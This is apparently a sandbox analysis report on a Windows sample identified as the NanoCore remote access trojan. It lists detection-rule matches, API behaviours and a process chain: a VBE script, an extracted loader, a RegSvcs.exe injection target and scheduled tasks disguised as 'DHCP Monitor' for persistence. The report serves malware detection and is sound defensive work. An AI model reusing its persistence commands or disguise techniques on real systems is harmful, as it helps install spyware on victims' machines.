Source: 0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000003.511098071.00000000074D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002BF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

7_2_002BF122

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: String function: 0096EB78 appears 39 times
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: String function: 0096EC50 appears 56 times
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: String function: 0096F5F0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: String function: 0026FD60 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: String function: 00270DC0 appears 46 times

Contains functionality to communicate with device drivers

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_00956FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00956FAA

Source: P05jmXYKpr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@30/36@16/2

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_00956C74 GetLastError,FormatMessageW,

0_2_00956C74

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0096A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_0096A6C2

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: P05jmXYKpr.exe	ReversingLabs: Detection: 70%
Source: P05jmXYKpr.exe	Virustotal: Detection: 68%

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File read: C:\Users\user\Desktop\P05jmXYKpr.exe

Jump to behavior

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\P05jmXYKpr.exe C:\Users\user\Desktop\P05jmXYKpr.exe
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c boaliim.dat ikvvfncnn.bmp
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat boaliim.dat ikvvfncnn.bmp
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpE586.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c boaliim.dat ikvvfncnn.bmp	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat boaliim.dat ikvvfncnn.bmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpE586.tmp	Jump to behavior

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002B194F AdjustTokenPrivileges,CloseHandle,		7_2_002B194F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002B1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		7_2_002B1F53

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002D4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

7_2_002D4089

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002C5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

7_2_002C5B27

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002BDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

7_2_002BDC9C

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{72ec1ea3-16bf-4e76-a7cf-15ed5e2a0279}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_01

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Command line argument: sfxname	0_2_0096DF1E
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Command line argument: sfxstime	0_2_0096DF1E
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Command line argument: STARTDLG	0_2_0096DF1E

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File written: C:\Users\user\AppData\Local\Temp\RarSFX0\nibh.ini

Jump to behavior

Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
